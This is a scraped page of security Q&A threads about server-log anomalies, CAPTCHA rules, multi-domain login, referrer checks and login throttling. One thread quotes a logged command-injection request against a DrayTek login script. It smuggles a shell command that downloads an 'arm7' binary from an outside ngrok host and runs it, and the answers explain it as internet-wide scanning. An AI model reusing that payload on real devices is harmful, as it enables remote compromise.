I saw in my server logs requests to "/?1=". What is this? Some sort of an attack attempt? - client-side-attacks

I saw this "/?1=" in two different apps I have. I have seen some weird stuff before and found that those are attacks targeted at wordpress which I never use. So, I wonder if this request is another weakness something else has.

Related

can you confirm me this strange post request is a kind of cyber attack?

I've opened a web site which has only the purpose of sharing textual information. No database pugged on backend or no idea of ​​authentication on it. However, when I looked at the log I had noticed this request:
POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
It has occurred two time and my server respond both time a 404 response. But now I'm a little bit concerned about it. My website is running on a raspberry which is pugged to my ISP device. even if my server doesn't have any sudo rights I'm wondering if their is any risk?
Also, can someone explain me what this suspicious entries mean. What could be the risk? And finally, can you share me some tips / good behavior to have when setting up a pipe between any device (raspberry) and internet.
No need to be concerned. It is an attack, but not directed at your specific site, but rather scanning a large portion of the internet for a specific vulnerability.
The fact that your server responded with a 404 means it did not contain the vulnerable page.
This will happen on any site exposed to the public internet and is considered a part of the background noise.
I also noticed same request on my web-servers.
Here is more info about the attack:
https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-draytek-products-could-allow-for-arbitrary-code-execution_2020-043/

When to Ask Captcha Rules?

While there is a lot of discussion about Captcha implementation, I couldn't find any details on what circumstances one should ask for Captcha especially for a financial app serving consumers.
Some of the rules I think of:
If 3 failed login/registrations attempts
If 3 duplicate calls if user already logged in.
I believe these rules are driven through security risk and is there a better way to manage this? Any library, which helps to solve this problem?
Unfortunately, in situations like this, you'll always have to make a compromise somewhere between security and convenience. I think the specific number you chose are fine; a human probably won't do those things and if something does, it's probably not a legitimate user. I would suggest that after you start to require CAPTCHAs to continue, you also continue counting those cases and log an alert at some point and eventually ban the IP address if their actions get out of hand.
One place you'll have to compromise is on how you track users. If you do it by cookies, it will be more accurate, but a bot can just not send cookies in most cases, eluding your tracking. The only real solution, then, is to track by IP addresses. The problem with this is that any users behind a shared IP address would look the same, so if three users all fail a single login, it would look the same (mostly) as one users failing three times. Also, if someone gets legitimately banned for abusing your site and is behind a shared IP address, it is possible that other legitimate customers could be affected.
To sum it up, you'll need to find the balance you need between security and convenience.

Multi-Domain Login

I'm working on a little node.js-project, and while googling alot, I kinda got a bit confused, but maybe some of you are able to point me towards the road again.
Several websites are generated by DocPad (excellent piece of software), and hosted on different domains.
All these websites shall now get a "login module" (which is also written in Node.js, using passport). Visually, it will look similar to the excellent login-slider from Web-Kreation (Here a demo). My plan was to use nginx and route all the /login-requests to the login-app, which is working fine.
The problem is rather related to the multiple domains, and the clientside implementation of it all. All logins use the same database.
Can I somehow use both together, and create the session-cookies from the Login-Module (which could use the same domain all the time)?
I'm answering my own question for reference, in case someone else comes across the same problem.
In the end, I solved my problem by having a bit of a different setup. Instead of a module, using the dns of each page, I use a central login-application for all sites. The sites itself do not require to access any personal information, so that's not a problem.
DocPad is still being used to generate the different websites (works excellent - I know I say this very often, but if there's a brilliant piece of software out, there's no reason to not mention it once in a while) statically, and all static content is delivered to the user using a CDN.
The login-system is a node.js-application using Redis as the only database. It is integrated via a simple iframe on all pages rendered by DocPad on login.example.com.
After successful login in 'login-app' you can create encrypted string with info about current user. You can pass this string back in get/post parameter with redirect to necessary domain. Encription key is known only to the 'login-app' and your websites. You can trust this encrypted data. It is necessary to make sure that every time the key is different for the same user. For example you can add the information about the time of login or random. After decrypting the data you can set authorization cookie for a particular domain.

"Referral Denied" Implementation

I was looking for a way to protect a web service from "Synthetic queries". Read this security stack question for more details.
It seemed that I had little alternative, until I came across NSE India's website which implements a certain kind of measure against such synthetic queries.
I would like to know how could they have implemented a protection which works somewhat this way: You go to their website and search for a quote, lets say, RELIANCE, we get a page displaying the latest quote.
On analysis we find that the query being sent across is something like:
http://www.nseindia.com/marketinfo/equities/ajaxGetQuote.jsp?symbol=RELIANCE&series=EQ
But when we directly copy paste the query in the browser, it returns "referral denied".
I guess such a procedure may also help me. Any ideas how I may implement something similar?
It won't help you. Faking a referrer is trivial. The only protection against queries the attacker constructs is server side validation.
Referrers sometimes can be used to sometimes prevent hotlinking from other websites, but even that is rather hard to do since certain programs create fake referrers and you don't want to block those users.
The problems referrer validation could help against other websites trying to manipulate the users browser into accessing your site. Like some kinds of cross site request forgery. But it does never protect against malicious users. Against those the only thing that helps is server side validation. You can never trust the client if you don't trust the user of that client.

How to defend excessive login requests?

Our team have built a web application using Ruby on Rails. It currently doesn't restrict users from making excessive login requests. We want to ignore a user's login requests for a while after she made several failed attempts mainly for the purpose of defending automated robots.
Here are my questions:
How to write a program or script that can make excessive requests to our website? I need it because it will help me to test our web application.
How to restrict a user who made some unsuccessful login attempts within a period? Does Ruby on Rails have built-in solutions for identifying a requester and tracking whether she made any recent requests? If not, is there a general way to identify a requester (not specific to Ruby on Rails) and keep track of the requester's activities? Can I identify a user by ip address or cookies or some other information I can gather from her machine? We also hope that we can distinguish normal users (who make infrequent requests) from automatic robots (who make requests frequently).
Thanks!
One trick I've seen is having form fields included on the login form that through css hacks make them invisible to the user.
Automated systems/bots will still see these fields and may attempt to fill them with data. If you see any data in that field you immediately know its not a legit user and ignore the request.
This is not a complete security solution but one trick that you can add to the arsenal.
In regards to #1, there are many automation tools out there that can simulate large-volume posting to a given url. Depending on your platform, something as simple as wget might suffice; or something as complex (relatively speaking) a script that asks a UserAgent to post a given request multiple times in succession (again, depending on platform, this can be simple; also depending on language of choice for task 1).
In regards to #2, considering first the lesser issue of someone just firing multiple attempts manually. Such instances usually share a session (that being the actual webserver session); you should be able to track failed logins based on these session IDs ang force an early failure if the volume of failed attempts breaks some threshold. I don't know of any plugins or gems that do this specifically, but even if there is not one, it should be simple enough to create a solution.
If session ID does not work, then a combination of IP and UserAgent is also a pretty safe means, although individuals who use a proxy may find themselves blocked unfairly by such a practice (whether that is an issue or not depends largely on your business needs).
If the attacker is malicious, you may need to look at using firewall rules to block their access, as they are likely going to: a) use a proxy (so IP rotation occurs), b) not use cookies during probing, and c) not play nice with UserAgent strings.
RoR provides means for testing your applications as described in A Guide to Testing Rails Applications. Simple solution is to write such a test containing a loop sending 10 (or whatever value you define as excessive) login request. The framework provides means for sending HTTP requests or fake them
Not many people will abuse your login system, so just remembering IP addresses of failed logins (for an hour or any period your think is sufficient) would be sufficient and not too much data to store. Unless some hacker has access to a great many amount of IP addresses... But in such situations you'd need more/serious security measurements I guess.

Resources